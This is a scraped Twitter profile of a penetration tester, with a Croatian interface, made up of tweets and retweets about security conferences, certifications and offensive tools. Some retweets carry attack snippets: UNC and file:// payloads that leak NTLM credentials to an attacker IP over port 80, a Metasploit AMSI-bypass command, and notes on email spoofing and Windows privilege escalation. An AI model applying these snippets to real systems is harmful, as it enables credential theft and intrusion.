Downgrader

@PvdH

Realising the dream as a pentester

Vrijeme pridruživanja: ožujak 2009.

Tweetovi

Blokirali ste korisnika/cu @PvdH

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @PvdH

  1. proslijedio/la je Tweet
    10. sij

    Red Team gave a workshop today and challenged our students with a . 😎🤩🙌 End of last year SecureLink officially became a Cyberworkplace , supporting and contributing to our mission. Read more:

    Poništi
  2. proslijedio/la je Tweet
    31. lis 2019.

    One command to rule them all! Just finished to update web_delivery to automatically bypass AMSI/SBL with latest definitions. Testing and feedbacks are welcome! Test it with: msfconsole -r web.rc

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet

    Vanmorgen lichtte Cybersecurity Advisor de belangrijkste vindingen uit het whitepaper 'Databreaches in Healthcare' toe in de ochtendspits bij : Medische dossiers zijn goud waard op het darkweb! Lees hier waarom:

    Poništi
  4. 20. lip 2019.

    Day 2 of Hack in Paris . Had some fun yesterday during the talks and of course the party.

    Poništi
  5. 5. lip 2019.
    Poništi
  6. proslijedio/la je Tweet
    30. tra 2019.

    Did know that u can steal by changing port to bypass sec-things: net use \\1.2.3.4@80\t or pdf : /F (\\\\IP@80\\t) or dubdoc : ///IP@80/t or doc: Target="file://IP@80/t.dotx" or lnk: URL=file://IP@80/t.htm or: IconFile=\\IP@80\t.ico cc

    Prikaži ovu nit
    Poništi
  7. 12. tra 2019.

    Recently I found a vulnerability in two Windows features. Not important enough for a CVE, however a blogpost have been made.

    Poništi
  8. 8. tra 2019.
    Poništi
  9. proslijedio/la je Tweet
    12. ožu 2019.

    De zaal bijna klaar voor 2019. Better Together is het thema. Al het nieuws over Cybersecurity morgen.

    Poništi
  10. proslijedio/la je Tweet
    19. velj 2019.

    Here is the whole exploit chain of Jenkins Unauthenticated RCE(and PoC video )! Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!

    Poništi
  11. proslijedio/la je Tweet
    13. velj 2019.

    We just released v2.15, with a new `wifi.assoc` command to perform a clientless PMKID attack, other new features and fixes!

    Poništi
  12. proslijedio/la je Tweet
    6. pro 2018.

    All presentation materials that were provided by Briefings speakers are now live on the website below the abstracts - Thank you to all our Speakers, Trainers, Attendees, and Sponsors for a great week in London

    Poništi
  13. 6. pro 2018.

    Fun talk at Black Hat by about exploiting vmware. After a demonstration of vm2017-0006 he left a warning. The SVGA3D protocol is complex and probably contains more security issues.

    Poništi
  14. 5. pro 2018.

    Looking forward for the briefings today.

    Poništi
  15. proslijedio/la je Tweet
    18. lis 2018.

    Powershell has a built in cmdlet called "Send-MailMessage" that makes email spoofing a breeze. One line and you can send HTML, Attachments, High Priority, whatever the heart desires.

    Poništi
  16. 3. lis 2018.

    Cool talk from Mathy Vanhoef . Helped me understanding the KRACK attack

    Poništi
  17. 2. lis 2018.

    What a week! Passed my GIAC GXPN exam , got myself (thanks to SecureLink) a ticket for Black Hat London and on my way to Ghent for BruCon

    Poništi
  18. proslijedio/la je Tweet
    25. ruj 2018.

    JuicyPotato - A useful tool to Escalate from Windows Service Account to NT AUTHORITY\SYSTEM 1. User needs SeImpersonate or SeAssignPrimaryToken privileges. 2. Uses COM Objects to escalate the privilege.

    Poništi
  19. proslijedio/la je Tweet

    Just released a new version to support Windows 10 1803 to bypass the Credential Guard authentication chain Reminder: your passwords/keys are not in the secure world... only its storage **after** authentication! this version is for you 😉

    Poništi
  20. 3. ruj 2018.

    Managed to get 2 tickets for BruCON. Bug bounty reward well spent!

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·